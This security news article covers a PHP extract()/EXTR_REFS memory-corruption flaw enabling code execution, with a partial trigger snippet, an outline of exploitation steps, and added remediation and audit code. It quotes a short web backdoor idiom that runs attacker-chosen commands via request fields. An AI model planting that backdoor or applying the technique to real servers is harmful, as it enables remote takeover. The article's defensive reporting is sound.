Wednesday, May 7, 2025

Critical Flaw in PHP’s extract() Function Enables Arbitrary Code Execution


A critical vulnerability in PHP’s extract() function has been uncovered, enabling attackers to execute arbitrary code by exploiting memory corruption flaws.

The issue affects PHP versions 5.x, 7.x, and 8.x, allowing malicious actors to trigger double-free (PHP 5.x) or use-after-free (PHP 7.x/8.x) conditions, ultimately leading to remote code execution (RCE).

Technical Breakdown

According to the SSD report, the flaw stems from improper handling of the EXTR_REFS flag in extract(), which imports variables into the symbol table as references.


When overwriting an existing variable, the function calls zval_ptr_dtor to destroy the original value. If the original variable holds an object, that object's __destruct method runs while the destruction is still in progress, which lets crafted input manipulate the heap. The triggering pattern looks like this (ExploitableClass stands in for a class whose destructor interferes with the variable being replaced; its body is not shown in the article):

// Example triggering the vulnerability
class ExploitableClass { /* __destruct body omitted */ }

$var = new ExploitableClass();                     // existing variable that extract() will overwrite
$malicious_array = ['var' => new ExploitableClass()];

extract($malicious_array, EXTR_REFS);              // overwriting $var runs zval_ptr_dtor on the old object

During this process, PHP’s internal zval_ptr_dtor function frees memory multiple times if an object’s destructor unsets the same variable, corrupting the heap.

In PHP 5.x, this causes a double-free, while newer versions suffer from use-after-free due to changes in memory management.

Vulnerability: Critical flaw in PHP's extract() function allows arbitrary code execution
Affected Versions: PHP 5.x (double-free), PHP 7.x & 8.x (use-after-free)
Root Cause: Improper memory management when using extract() with the EXTR_REFS flag, especially during object destruction
Trigger Condition: An object's __destruct method unsets a variable during an ongoing zval_ptr_dtor call in extract()
Vulnerability Type: Double-free (PHP 5.x), use-after-free (PHP 7.x, 8.x)
Impact: Heap corruption, arbitrary read/write, and remote/native code execution

Exploitation Impact

Attackers can leverage this to:

  1. Overwrite critical memory structures (e.g., PHP’s HashTable or zval objects).
  2. Execute arbitrary native code by manipulating heap allocations to gain read/write primitives.
  3. Bypass security mechanisms like disable_functions by hijacking PHP’s internal function handlers.

Proof-of-concept exploits demonstrate how to chain these primitives to achieve RCE. For instance, overwriting the handler of a disabled function like system() with a legitimate address restores its execution capability.

The PHP team has patched the issue; the fix is tracked in GitHub advisory GHSA-4pwq-3fv3-gm94. Administrators should:

  1. Update PHP to the latest version immediately.
  2. Audit code for unsafe extract() usage, especially with user-controlled data (e.g., extract($_POST)).
  3. Replace extract() with explicit variable assignments or use flags like EXTR_PREFIX_ALL to isolate variables.
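The three remediation steps above, written out in code. This is an added example, not code from the article or from the PHP project: $request is a constructed stand-in for $_POST, and the function names are illustrative.

```php
<?php
// Added example (not from the article or the PHP project): the unsafe
// extract($_POST) idiom beside two safer replacements.
declare(strict_types=1);

// Constructed sample request; in production this would be $_POST.
$request = [
    'username' => 'alice',
    'page'     => '3',
    'is_admin' => '1',       // attacker-supplied key that extract() would import blindly
    'ctime'    => 'system',  // the backdoor idiom quoted later in the article
];

// The legacy pattern: every request key becomes a local variable, so
// $is_admin and $ctime now exist and can shadow trusted values.
function unsafeImport(array $input): array
{
    extract($input);
    return array_keys(get_defined_vars()); // input, username, page, is_admin, ctime
}

// Step 3a: explicit assignment of the keys the handler expects, with types enforced.
function readPagingParams(array $input): array
{
    $username = isset($input['username']) && is_string($input['username'])
        ? $input['username'] : '';
    $page = filter_var($input['page'] ?? 1, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'default' => 1]]);
    return ['username' => $username, 'page' => $page];
}

// Step 3b: if extract() cannot be removed yet, restrict the keys first and use
// EXTR_PREFIX_ALL so nothing in the caller's scope can be overwritten.
// EXTR_REFS is never passed for untrusted input.
function legacyImport(array $input): array
{
    $allowed = array_intersect_key($input, array_flip(['username', 'page']));
    extract($allowed, EXTR_PREFIX_ALL, 'req');
    // Only $req_username and $req_page were created; $is_admin and $ctime never exist here.
    return array_filter(get_defined_vars(),
        fn(string $k): bool => str_starts_with($k, 'req_'), ARRAY_FILTER_USE_KEY);
}

print_r(unsafeImport($request));
print_r(readPagingParams($request));
print_r(legacyImport($request));
```

Note that EXTR_PREFIX_ALL and EXTR_SKIP are alternative modes rather than bit flags that can be OR-ed together; only EXTR_REFS combines with a mode, and that is the combination the advisory concerns.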

This vulnerability underscores long-standing risks in PHP’s extract(), which has been flagged for decades as prone to misuse. Past incidents include backdoors like:

@extract($_REQUEST);

@die($ctime($atime)); // Allows $_REQUEST['ctime']('command') execution

Developers are urged to avoid extract() entirely for user input and adopt secure coding practices.
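For audit step 2 above and the backdoor idiom just quoted, the following is an added example (not code from the article, the SSD report or the PHP project) of a small review script built on PHP's own token_get_all(). It flags extract() calls that take a request superglobal, pass EXTR_REFS, are silenced with '@', or lack a mode that prevents overwriting existing variables. auditExtractCalls and the sample source it scans are constructed for this example.

```php
<?php
// Added example: audit a PHP source string for extract() calls worth reviewing.
declare(strict_types=1);

function auditExtractCalls(string $source): array
{
    $findings = [];
    $tokens = token_get_all($source);
    $count = count($tokens);

    for ($i = 0; $i < $count; $i++) {
        $t = $tokens[$i];
        if (!is_array($t) || $t[0] !== T_STRING || strcasecmp($t[1], 'extract') !== 0) {
            continue;
        }
        $line = $t[2];

        // The next non-whitespace token must be '(' for this to be a call.
        $j = $i + 1;
        while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $count || $tokens[$j] !== '(') {
            continue;
        }

        // Was the call silenced with the '@' operator (the backdoor idiom)?
        $k = $i - 1;
        while ($k >= 0 && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) {
            $k--;
        }
        $suppressed = ($k >= 0 && $tokens[$k] === '@');

        // Collect the raw argument text up to the matching ')'.
        $depth = 0;
        $args = '';
        for (; $j < $count; $j++) {
            $tok = $tokens[$j];
            $text = is_array($tok) ? $tok[1] : $tok;
            if ($text === '(') {
                $depth++;
                if ($depth === 1) {
                    continue;
                }
            }
            if ($text === ')') {
                $depth--;
                if ($depth === 0) {
                    break;
                }
            }
            $args .= $text;
        }

        $reasons = [];
        if (preg_match('/\$_(POST|GET|REQUEST|COOKIE)\b/', $args)) {
            $reasons[] = 'request superglobal used as source';
        }
        if (preg_match('/\bEXTR_REFS\b/', $args)) {
            $reasons[] = 'EXTR_REFS imports variables by reference';
        }
        if (!preg_match('/\bEXTR_(SKIP|PREFIX_ALL)\b/', $args)) {
            $reasons[] = 'no EXTR_SKIP/EXTR_PREFIX_ALL, existing variables can be overwritten';
        }
        if ($suppressed) {
            $reasons[] = 'error-suppressed call (@)';
        }
        if ($reasons !== []) {
            $findings[] = ['line' => $line, 'call' => "extract($args)", 'reasons' => $reasons];
        }
    }
    return $findings;
}

// Constructed sample source, including the backdoor idiom quoted in the article.
$sample = <<<'PHP'
<?php
@extract($_REQUEST);
@die($ctime($atime));
extract($config, EXTR_REFS);
extract($settings, EXTR_PREFIX_ALL, 'cfg');
PHP;

foreach (auditExtractCalls($sample) as $f) {
    printf("line %d: %s\n    %s\n", $f['line'], $f['call'], implode('; ', $f['reasons']));
}
```

Run against the sample, the first two extract() calls are reported and the prefixed one is not; pointing the function at real files (file_get_contents over a source tree) gives a quick inventory to work through before or after the PHP upgrade.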

The extract() vulnerability highlights the dangers of legacy functions in modern ecosystems.

While patches are available, proactive code reviews and dependency updates remain critical to mitigating such risks.

Organizations using PHP should prioritize upgrading and eliminating unsafe patterns to prevent exploitation.

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
